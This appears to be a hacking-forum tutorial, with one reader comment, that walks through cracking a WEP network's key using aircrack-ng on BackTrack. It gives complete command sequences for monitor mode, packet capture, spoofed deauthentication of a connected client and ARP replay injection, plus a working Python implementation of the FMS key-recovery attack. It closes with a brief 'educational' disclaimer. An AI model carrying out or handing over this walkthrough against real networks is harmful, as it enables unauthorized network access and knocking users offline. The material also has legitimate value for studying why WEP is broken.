TheTAZZone - Internet Chaos

Tutorial- Aircrack on Backtrack with clients (WEP)



OK, this tutorial should be pretty straightforward and easy; then again, that's the entire idea behind a tutorial, right? Anyway, to business: this tutorial will show you how to crack WEP very quickly using aircrack-ng on the BackTrack security live CD, which you can find here:

**Quick note: cracking WEP with no clients will be out tonight/sometime real soon.**

We will go over:
1) Putting your Atheros-based card into monitor mode
2) Getting packet injection ready
3) Injecting/sniffing
4) Cracking the WEP key

This is the easier method, the one where the WEP network has clients present, so you can deauth one of them and replay the ARP traffic it generates when it reconnects. OK, enough talk, to business!

Monitor Mode

The first thing to do is boot up BackTrack, basically by booting from the CD like you normally would; if you can't figure this out, ask down below or use Google. Log in to BackTrack as root (password 'toor'), then type "startx" at the command line to start the GUI.

Sweet, now we are running *nix and can start the good stuff. Open a terminal by clicking the icon that looks like one on the panel at the bottom, next to the 'start' type thingy (let me know if I get too technical :) )

Now, we need to enter this into the command line:

$ airmon-ng start wifi0 6

**starts a monitor-mode interface (ath1 on madwifi-ng) on wifi0, locked to channel 6; change 6 to the channel of the network you are attacking. Kismet, or a quick airodump-ng run without --channel, will show you the channel; not covered in this tutorial**

$ wlanconfig ath0 destroy
$ ifconfig ath1 up
$ iwconfig ath1 mode monitor channel 6

**the first line removes the regular managed interface ath0 so it doesn't fight ath1 for the channel; the last line makes sure ath1 is in monitor mode on channel 6 (iwconfig wants the keyword "channel" before the number). Running "iwconfig ath1" afterwards should show Mode:Monitor and the channel you picked; if it doesn't, nothing below will work**

Sweet, now our card is in monitor mode, and we can move on to bigger and better things.

Start up airodump-ng and get some info ready

OK, let's start airodump-ng so we can get some info out of it, and then we can just leave it running.

$ airodump-ng --ivs --write bob --channel 6 ath1

**basically, here's what each thing means:
--ivs = only save the IVs (the initialization vectors, which are what aircrack-ng needs for WEP), not every full packet, so the file stays small
--write = the prefix of the file we are writing to; airodump-ng adds a sequence number, so the file is bob-01.ivs
--channel = the channel to listen on (lock it to the AP's channel; if airodump-ng hops, it misses most of the packets)
ath1 = our monitor-mode interface**

Now that airodump-ng is running, we need to grab two pieces of information from it: 1) the MAC address of the AP we are attacking, which is in the BSSID column (the first column) of the top table; check that its ENC column says WEP, since none of this applies to WPA. 2) the MAC address of a computer connected to that network, which is in the STATION column of the lower table, on a row whose BSSID column shows the AP's MAC.

Now, open up a new terminal (DON'T CLOSE AIRODUMP) and type these lines in:

$ export AP=mac_of_ap
$ export MAC=mac_of_connected_computer

This just stores those two MACs (in the aa:bb:cc:dd:ee:ff form airodump-ng shows them) as shell variables, so you don't have to type them a bunch of times in the coming steps. The variables only exist in this terminal, so run the aireplay-ng and aircrack-ng commands below from this same window.

Getting everything ready

Good, now we have airodump-ng running, and we can move on to getting packet injection ready. In the new console we opened to export our variables, type in the following, but do NOT run it yet:

$ aireplay-ng -0 10 -a $AP -c $MAC ath1

OK, we are running aireplay-ng attack 0 ten times ("-0 10"), which is a deauthentication attack: it sends spoofed deauth frames so the client gets kicked off the network and reconnects, and a client that has just reconnected almost always sends ARP traffic, which is what we want to capture and replay. "-a" is the MAC address of the AP we are attacking that we stored before, "-c" is the client we are deauthing, and again ath1 is our interface.

Now, let's get aireplay-ng ready to snag those ARP packets we are going to get:

$ aireplay-ng -3 -b $AP -h $MAC ath1

Really quickly, this is attack number 3, the ARP request replay attack. "-b" is the AP's MAC and "-h" is the source MAC to inject with: we use the associated client's MAC so the AP accepts our injected frames. It waits until it sees an ARP packet it can replay (it recognizes ARP by its fixed size without needing to decrypt it); if it asks whether you want to use the packet it found, say yes (type y, press Enter). It then replays that packet over and over, and the AP re-encrypts and rebroadcasts it with a fresh IV each time, which is what gets you a lot of IVs fast.

Good, everything is ready; on to the actual thing!

The Attack!

Now we have 2 attacks just chilling there ready to go, and airodump-ng still running in the background. Start attack number 3 (the replay) first, then run your deauth attack, so the replay is already listening when the client reconnects and sends ARP. The replay attack will eventually find a packet (if it asks whether to use it, type y). Now look at airodump-ng!

Your #Data column should be shooting up on the AP you are attacking! It took me about 3 minutes to collect 100k data packets, more than enough for a 64-bit WEP key. Now, to crack the key, we need to type in one more command and wait less than a minute. You don't have to close anything or stop airodump-ng/aireplay-ng.

Go to the window we used for the deauth attack (the one where $AP is set) and type in this command:

$ aircrack-ng -n 64 -b $AP *.ivs

Poof, aircrack-ng should start, and in a few moments you should have your WEP key! If not, wait a bit longer while airodump-ng collects more IVs and run it again; you can rerun aircrack-ng as often as you like. If all else fails, it might be a 128-bit key: change "-n 64" to "-n 128" and try again. With the older KoreK/FMS statistical attacks a 128-bit key needed about a million #Data; the PTW attack that aircrack-ng 0.9 and later use by default usually gets there with well under 100k. If you don't get it then, I don't know what to tell you!
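To see why the IVs airodump-ng has been saving (the --ivs file) are enough to recover the key, here is a small self-contained demonstration in Python. It is an added example, not code from this tutorial or from aircrack-ng: it encrypts a constructed ARP request under a made-up 40-bit key the way an AP would, then recovers the key from nothing but each frame's IV and first ciphertext byte, using the Fluhrer-Mantin-Shamir statistical attack and confirming the final candidate with the ICV check, which is how aircrack-ng confirms a key guess too. The key, the ARP frame contents and the choice of IVs are all assumptions for the demo; in particular it generates the classic FMS weak IVs (B+3, 255, X) directly instead of waiting for them to show up in a capture. Many APs have filtered those weak IVs out since around 2002, which is why aircrack-ng moved on to the KoreK and PTW attacks; those use all IVs rather than just weak ones, but rest on the same idea shown here.

```python
"""Toy WEP key recovery (FMS attack + ICV check). Constructed demo, not aircrack-ng code."""
import zlib

# Constructed 40-bit ("64-bit") WEP key for the demo; not a real network's key.
KEY = bytes([0x1F, 0x2A, 0x3B, 0x4C, 0x5D])

# An ARP request as it sits inside an 802.11 data frame: the 8-byte LLC/SNAP header
# (always AA AA 03 00 00 00 08 06 for ARP) followed by 28 ARP bytes. MACs/IPs are made up.
ARP_REQUEST = (bytes.fromhex("aaaa030000000806")            # LLC/SNAP, EtherType 0x0806
               + bytes.fromhex("0001080006040001")          # Ethernet / IPv4 / op = request
               + bytes.fromhex("001122334455") + bytes([192, 168, 1, 10])   # sender
               + bytes(6) + bytes([192, 168, 1, 1]))                        # target


def rc4_ksa(key):
    """RC4 key scheduling; WEP feeds it IV || key, so 3 of the 8 key bytes are public."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key, n):
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key, iv, plaintext):
    """Frame body = IV (3 bytes, in the clear) || RC4_{IV||key}(plaintext || CRC-32 ICV)."""
    data = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    ks = rc4_keystream(iv + key, len(data))
    return iv + bytes(a ^ b for a, b in zip(data, ks))


def wep_icv_ok(key, frame):
    """Decrypt under a candidate key and check the ICV; a wrong key fails this."""
    iv, body = frame[:3], frame[3:]
    data = bytes(a ^ b for a, b in zip(body, rc4_keystream(iv + key, len(body))))
    return zlib.crc32(data[:-4]).to_bytes(4, "little") == data[-4:]


def capture_weak_ivs(key):
    """Stand-in for airodump-ng + aireplay-ng -3: the AP re-encrypts the replayed ARP
    under new IVs. Here we pick the FMS weak IVs (B+3, 255, X) directly (assumption)."""
    return [wep_encrypt(key, bytes([b + 3, 255, x]), ARP_REQUEST)
            for b in range(len(key)) for x in range(256)]


def fms_votes(samples, known):
    """Vote on key byte len(known) from (iv, first keystream byte) pairs."""
    B = len(known)
    votes = [0] * 256
    for iv, k0 in samples:
        K = iv + known
        S = list(range(256))
        j = 0
        for i in range(B + 3):            # run the KSA only as far as the known bytes allow
            j = (j + S[i] + K[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        if S[1] >= B + 3 or (S[1] + S[S[1]]) & 0xFF != B + 3:
            continue                      # not a "resolved" IV; it leaks nothing usable
        # With probability about e^-3 the rest of the KSA leaves S[1], S[S[1]] and S[B+3]
        # alone; then the first keystream byte equals the value at S[j + S[B+3] + key[B]].
        votes[(S.index(k0) - j - S[B + 3]) & 0xFF] += 1
    return votes


def crack_wep(frames, keylen=5, fudge=3):
    """Recover the key from IV + first ciphertext byte of each frame. The first plaintext
    byte of every ARP/IP frame is the SNAP byte 0xAA, so keystream byte 0 is known.
    Like aircrack-ng's fudge factor, try the top few candidates per byte and confirm
    the full key with the ICV instead of trusting the vote blindly."""
    samples = [(f[:3], f[3] ^ 0xAA) for f in frames]

    def search(known):
        if len(known) == keylen:
            return known if wep_icv_ok(known, frames[0]) else None
        votes = fms_votes(samples, known)
        for cand in sorted(range(256), key=lambda b: -votes[b])[:fudge]:
            found = search(known + bytes([cand]))
            if found is not None:
                return found
        return None

    return search(b"")


if __name__ == "__main__":
    print("recovered key:", crack_wep(capture_weak_ivs(KEY)).hex())   # -> 1f2a3b4c5d
```

Run it as a script and it prints the recovered key. The interesting part is fms_votes: the attacker runs only the first B+3 steps of the RC4 key schedule, which need just the public IV and the key bytes already recovered, checks the "resolved" condition, and reads the next key byte off the first keystream byte. That byte is known because every ARP or IP frame starts with the SNAP byte 0xAA, which is also why this tutorial pushes ARP traffic: each replay hands you one more (IV, keystream byte) pair for free.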

I hope you learned something, or got an idea of something, and enjoyed yourself! Remember, soon I will be posting cracking WEP on a network with no clients present.

**Obligatory disclaimer: this tutorial was written as an educational piece; cracking into somebody else's network is illegal and punishable by fine/jail. Don't be stupid.**

One Response to Tutorial- Aircrack on Backtrack with clients (WEP)

  1. Vinoth July 25, 2009 at 4:05 am

    Why do we need to have our card in monitor mode?
